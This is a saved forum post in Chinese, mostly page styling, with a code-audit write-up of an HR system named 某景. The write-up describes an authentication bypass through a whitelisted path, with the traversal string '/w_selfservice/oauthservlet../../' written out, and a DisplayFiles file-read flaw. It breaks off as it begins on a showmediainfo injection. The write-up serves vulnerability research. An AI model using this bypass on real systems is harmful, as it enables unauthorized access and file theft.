Penetration_Testing_POC/books/记宏景的一次代码审计[DisplayFiles文件读取和showmediainfo注入].html

<!DOCTYPE html> <html><!--
 Page saved with SingleFile 
 url: https://forum.butian.net/share/2929 
--><meta charset=utf-8>
<meta http-equiv=X-UA-Compatible content="IE=edge">
<meta name=viewport content="width=device-width, initial-scale=1">
<meta name=csrf-token content=VD0owLiLrat8LaN2vBAqJtnLFngrtZgXtzYM7DqG>
<title>奇安信攻防社区-记某景的一次代码审计</title>
<meta name=keywords content=奇安信,天眼,补天,漏洞,情报,攻防,安全>
<meta name=description content=奇安信攻防社区-记某景的一次代码审计>
<meta name=author content="QIANXIN Team">
<meta name=copyright content="2021 QIANXIN.com">
<style>@media(max-width:767px){}</style>
<style>/*!
 * Bootstrap v3.4.1 (https://getbootstrap.com/)
 * Copyright 2011-2019 Twitter, Inc.
 * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
 *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}a:active,a:hover{outline:0}img{border:0}textarea{color:inherit;font:inherit;margin:0}textarea{overflow:auto}/*! Source: https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css */*{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}:after,:before{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}html{-webkit-tap-highlight-color:rgba(0,0,0,0)}a:focus,a:hover{color:#23527c;text-decoration:underline}a:focus{outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}img{vertical-align:middle}h2,h3{font-family:inherit;font-weight:500;line-height:1.1;color:inherit}h3{margin-top:20px;margin-bottom:10px}h3{font-size:24px}p{margin:0 0 10px}@media(min-width:768px){}.text-muted{color:#777}ul{margin-top:0;margin-bottom:10px}.list-inline{padding-left:0;list-style:none;margin-left:-5px}.list-inline>li{display:inline-block;padding-right:5px;padding-left:5px}@media(min-width:768px){}code{color:#c7254e}pre{display:block;margin:0 0 10px;color:#333;word-break:break-all;border:1px solid #ccc}.container{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}@media(min-width:768px){.container{width:750px}}@media(min-width:992px){.container{width:970px}}@media(min-width:1200px){.container{width:1170px}}.row{margin-right:-15px;margin-left:-15px}.col-xs-12{position:relative;min-height:1px;padding-right:15px;padding-left:15px}.col-xs-12{float:left}.col-xs-12{width:100%}@media(min-width:768px){}@media(min-width:992px){.col-md-9{float:left}}@media(min-width:1200px){}@media screen and (max-width:767px){}@media screen and (-webkit-min-device-pixel-ratio:0){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-device-width:480px) and (orientation:landscape){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-width:767px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-width:767px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-width:767px){}@media(max-width:767px){}@media screen and (min-width:768px){}@-webkit-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@-o-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@media(min-width:768px){}@media(min-width:992px){}@media all and (transform-3d),(-webkit-transform-3d){}@media screen and (min-width:768px){}.btn-group-vertical>.btn-group:after,.btn-group-vertical>.btn-group:before,.btn-toolbar:after,.btn-toolbar:before,.clearfix:after,.clearfix:before,.container-fluid:after,.container-fluid:before,.container:after,.container:before,.dl-horizontal dd:after,.dl-horizontal dd:before,.form-horizontal .form-group:after,.form-horizontal .form-group:before,.modal-footer:after,.modal-footer:before,.modal-header:after,.modal-header:before,.nav:after,.nav:before,.navbar-collapse:after,.navbar-collapse:before,.navbar-header:after,.navbar-header:before,.navbar:after,.navbar:before,.pager:after,.pager:before,.panel-body:after,.panel-body:before,.row:after,.row:before{display:table;content:" "}.btn-group-vertical>.btn-group:after,.btn-toolbar:after,.clearfix:after,.container-fluid:after,.container:after,.dl-horizontal dd:after,.form-horizontal .form-group:after,.modal-footer:after,.modal-header:after,.nav:after,.navbar-collapse:after,.navbar-header:after,.navbar:after,.pager:after,.panel-body:after,.row:after{clear:both}@-ms-viewport{width:device-width}@media(max-width:767px){}@media(max-width:767p
<style>/*!
 *  Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome
 *  License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
 */@font-face{font-family:"FontAwesome";src:url(data:font/woff2;base64,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
<style>@media(min-width:1200px){}@media(min-width:768px){}@media(max-width:767px){}@media(max-width:767px){}pre{white-space:pre-wrap}@media(min-width:768px){}@media(min-width:992px){}@media(min-width:1200px){}html{font-size:10px;-webkit-tap-highlight-color:transparent}body{font-family:-apple-system,"Helvetica Neue",Helvetica,Arial,"PingFang SC","Hiragino Sans GB","WenQuanYi Micro Hei","Microsoft Yahei",sans-serif;font-size:14px;line-height:1.5;color:#333;background-color:#f6f6f6;word-break:break-word}textarea{font-family:inherit;font-size:inherit;line-height:inherit}ul{padding:0}.wrap{padding-bottom:30px;position:relative}.main{background-color:#fff;border-radius:4px}.mb-20{margin-bottom:20px}.mt-10{margin-top:10px}.mt-30{margin-top:30px}.taglist-inline{list-style:none;padding:0;font-size:0}.taglist-inline li{padding:0;font-size:13px}.taglist-inline>li{display:inline-block;margin-right:5px}.taglist-inline>li:last-child{margin-right:0}.widget-article .quote{padding:25px;background:#f3f5f9;line-height:24px;overflow:hidden}@media(min-width:768px){}.word-wrap{word-wrap:break-word;word-break:normal}::-webkit-scrollbar{width:6px;height:6px}::-webkit-scrollbar-thumb{background-color:#e4e6eb;outline:0;border-radius:2px}::-webkit-scrollbar-track{box-shadow:none;border-radius:2px}</style>
<style>a{text-decoration:none}a:focus,a:hover{color:#004e31;text-decoration:underline}@media(max-width:767px){}@media(max-width:767px){}.tag{display:inline-block;padding:0 8px;color:#017e66;background-color:#e7f2ed;height:24px;line-height:24px;font-weight:400;font-size:13px;text-align:center}.tag[href]:focus,.tag[href]:hover{background-color:#017e66;color:#fff;text-decoration:none}</style>
<style>@-moz-keyframes blink{50%{background-color:transparent}}@-webkit-keyframes blink{50%{background-color:transparent}}@keyframes blink{50%{background-color:transparent}}pre code.hljs{overflow-x:auto}.hljs{color:#000}.hljs-built_in,.hljs-keyword{color:#00f}.hljs-literal,.hljs-string,.hljs-title{color:#a31515}.hljs-attr{color:red}.markdown-body{color-scheme:light;--color-prettylights-syntax-comment:#6e7781;--color-prettylights-syntax-constant:#0550ae;--color-prettylights-syntax-entity:#8250df;--color-prettylights-syntax-storage-modifier-import:#24292f;--color-prettylights-syntax-entity-tag:#116329;--color-prettylights-syntax-keyword:#cf222e;--color-prettylights-syntax-string:#0a3069;--color-prettylights-syntax-variable:#953800;--color-prettylights-syntax-brackethighlighter-unmatched:#82071e;--color-prettylights-syntax-invalid-illegal-text:#f6f8fa;--color-prettylights-syntax-invalid-illegal-bg:#82071e;--color-prettylights-syntax-carriage-return-text:#f6f8fa;--color-prettylights-syntax-carriage-return-bg:#cf222e;--color-prettylights-syntax-string-regexp:#116329;--color-prettylights-syntax-markup-list:#3b2300;--color-prettylights-syntax-markup-heading:#0550ae;--color-prettylights-syntax-markup-italic:#24292f;--color-prettylights-syntax-markup-bold:#24292f;--color-prettylights-syntax-markup-deleted-text:#82071e;--color-prettylights-syntax-markup-deleted-bg:#ffebe9;--color-prettylights-syntax-markup-inserted-text:#116329;--color-prettylights-syntax-markup-inserted-bg:#dafbe1;--color-prettylights-syntax-markup-changed-text:#953800;--color-prettylights-syntax-markup-changed-bg:#ffd8b5;--color-prettylights-syntax-markup-ignored-text:#eaeef2;--color-prettylights-syntax-markup-ignored-bg:#0550ae;--color-prettylights-syntax-meta-diff-range:#8250df;--color-prettylights-syntax-brackethighlighter-angle:#57606a;--color-prettylights-syntax-sublimelinter-gutter-mark:#8c959f;--color-prettylights-syntax-constant-other-reference-link:#0a3069;--color-fg-default:#24292f;--color-fg-muted:#57606a;--color-fg-subtle:#6e7781;--color-canvas-default:#fff;--color-canvas-subtle:#f6f8fa;--color-border-default:#d0d7de;--color-border-muted:hsl(210,18%,87%);--color-neutral-muted:rgba(175,184,193,0.2);--color-accent-fg:#0969da;--color-accent-emphasis:#0969da;--color-attention-subtle:#fff8c5;--color-danger-fg:#cf222e}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;margin:0;color:var(--color-fg-default);background-color:var(--color-canvas-default);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body img{border-style:none;max-width:100%;-webkit-box-sizing:content-box;box-sizing:content-box;background-color:var(--color-canvas-default)}.markdown-body ::-webkit-input-placeholder{color:inherit;opacity:.54}.markdown-body ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.markdown-body h2,.markdown-body h3{margin-top:24px;margin-bottom:16px;line-height:1.25}.markdown-body h2{font-weight:600;padding-bottom:.3em;font-size:1.5em;border-bottom:1px solid var(--color-border-muted)}.markdown-body h3{font-weight:600;font-size:1.25em}.markdown-body code{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace}.markdown-body pre{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace;word-wrap:normal}.markdown-body ::-webkit-input-placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body ::placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>*:first-child{margin-top:0 !important}.markdown-body>*:last-child{margin-bottom:0 !important}.markdown-body p,.markdown-body pre{margin-top:0;margin-bottom:16px}.markdown-body code{padding:.2em .4em;margin:0;font-size:85%;background-color:var(--color-neutral-muted);border-radius:6px}.markdown-body pre code{font-size:100%}.markdown-body pre>code{word-break:normal;white-space:
<style>#md_view{padding:0 20px}#md_view img:hover{cursor:pointer}</style>
<!--[if lt IE 9]>
    <script src="/static/js/html5shiv.min.js"></script>
    <script src="/static/js/respond.min.js"></script>
    <![endif]-->
<style>html #layuicss-skinlayercss{display:none;position:absolute;width:1989px}@-webkit-keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
 * Waves v0.7.5
 * http://fian.my.id/Waves
 * 
 * Copyright 2014-2016 Alfiana E. Sibuea and other contributors
 * Released under the MIT license
 * https://github.com/fians/Waves/blob/master/LICENSE
 */</style><style>@media(max-height:620px){}@media(max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media(pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:transl
<body>
<div class="global-nav mb-50" style="display:none !important">
 
</div>
<div class="top-alert mt-60 clearfix text-center" style="display:none !important">
 <!--[if lt IE 9]>
    <div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>，放学别走，升级完浏览器再说
        <a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
    </div>
    <![endif]-->
 
 </div>
<div class=wrap>
 <div class=container>
 <div class="row mt-10">
 <div class="col-xs-12 col-md-9 main">
 <div class=widget-article>
 <h3 class="title word-wrap">记某景的一次代码审计</h3>
 <ul class=taglist-inline>
 <li class=tagPopup><a class=tag href=https://forum.butian.net/topic/48>漏洞分析</a></li>
 </ul>
 <div class="content mt-10">
 <div class="quote mb-20">
 过滤器查找+漏洞审计+加解密算法破解
 </div>
 <textarea id=md_view_content style=display:none>0x00 前言
-------

我只能说，某景漏洞多的一。。。。。。  
今天，就捡两个公开过的漏洞进行下审计吧

0x01 过滤器查找
----------

有经验的师傅都知道，此系统很多接口是做了鉴权的，并不能未授权访问。但是，有的接口加白了，可以通过加白接口进行路径穿越绕过鉴权。  
废话不多说，开始正题。一般过滤器都会在web.xml里找到对应的接口与类名，搜索单词filter,定位到HireKeywordFilter类

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-e915435870da16d89fbf343cabfde91811606bb9.png)  
查看代码，`var3.doFilter(var1, var2);`这行代码是调用FilterChain对象的`doFilter`方法，将ServletRequest对象和ServletResponse对象传递给下一个过滤器或Servlet进行处理。在Servlet过滤器中，通过调用`FilterChain`的`doFilter`方法，可以将请求传递给过滤器链中的下一个过滤器，或者如果没有下一个过滤器了，则传递给Servlet进行处理。

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-0143d4032168a6f34aa3bf9c8a1988d34c598a23.png)  
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-f19e2b457b2159bf53acc44ae2c0447817615c95.png)  
在这个例子中，若var6也就是uri是以/w\_selfservice/oauthservlet开头的，即执行`var3.doFilter(var1, var2);`。那么当我访问其他接口。则使用/w\_selfservice/oauthservlet../../即可绕过鉴权

0x02 漏洞审计
---------

在此，以最近爆出的DisplayFiles文件读取和showmediainfo注入为例开始审计。

### DisplayFiles文件读取

web.xml搜索DisplayFiles，定位到代码：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-1fe101217d961ee175fd4c85ddd105967aa1278e.png)

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-e08543345f63e80e0b0705e19c55ccb27caeeafa.png)  
可见从前端接受参数filepath，赋值给var3变量，var3经过SafeCode.decode方法，PubFunc.decrypt方法后，得到明文，根据方法名就可以初步猜测是解码和解密操作。后续就很简单了，var3传入File类，赋值给var4,开始获取文件的字节流并输出到响应里面

### showmediainfo注入

web.xml搜索showmediainfo，定位到代码：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-2f400f9b8a2632f0252219ea3d9545775eeabc01.png)

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-35a615af34a2338ebb7b88db52e34c07f1c06bd9.png)

